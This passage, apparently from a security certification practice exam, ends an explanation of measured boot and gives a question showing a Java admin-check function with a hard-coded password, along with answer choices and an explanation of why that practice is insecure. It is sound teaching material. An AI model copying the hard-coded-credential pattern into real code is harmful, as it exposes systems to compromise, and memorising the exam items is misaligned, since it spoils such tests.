Measured boot is a feature where a log of all boot actions is taken and stored in a trusted platform module for later retrieval and analysis by anti-malware software on a remote server. Master boot record analysis is used to capture the hard disk’s required information to support a forensic investigation. It would not detect malware during the system’s boot-up process. Startup control would be used to determine which programs will be loaded when the operating system is initially booted, but this would be too late to detect malware loaded during the pre-startup and boot process. Advanced anti-malware solutions are programs that are loaded within the operating system. Therefore, they are loaded too late in the startup process to be effective against malicious boot sector viruses and other BIOS/UEFI malware variants.

Question 50

Your company has been contracted to develop an Android mobile application for a major bank. You have been asked to verify the security of the Java function’s source code below:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-int verifyAdmin(String password) { if (password.equals(“mR7HCS14@31&#”)) { return 0; } return 1;}

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following vulnerabilities exist in this application’s authentication function based solely on the source code provided?

Your answer is incorrect
The function is vulnerable to an SQL injection attack

The function is using hard-coded credentials to verify the password entered by the user

The function is vulnerable to a buffer overflow attack
The function is using parameterized queries

Answer 50

The function is using hard-coded credentials in the function, which is an insecure practice that can lead to compromise. The password for the application is shown in the source code as mR7HCS14@31&#. Even if this was obfuscated using encoding or encryption, it is a terrible security practice to include hard-coded credentials in the application since they can be reverse engineered by an attacker, and in this case, it could be used to rob the bank or its customers! There is no evidence of a SQL injection or buffer overflow attack vulnerability based on the code being shown. In fact, this code doesn’t even show any SQL or ability to connect to an SQL database. We cannot see the variable initiation in this code, either, so we cannot determine if it is vulnerable to a buffer overflow attack. Finally, a parameterized query is a security feature, not a vulnerability, and this source code does not show any evidence of parameterized queries being used.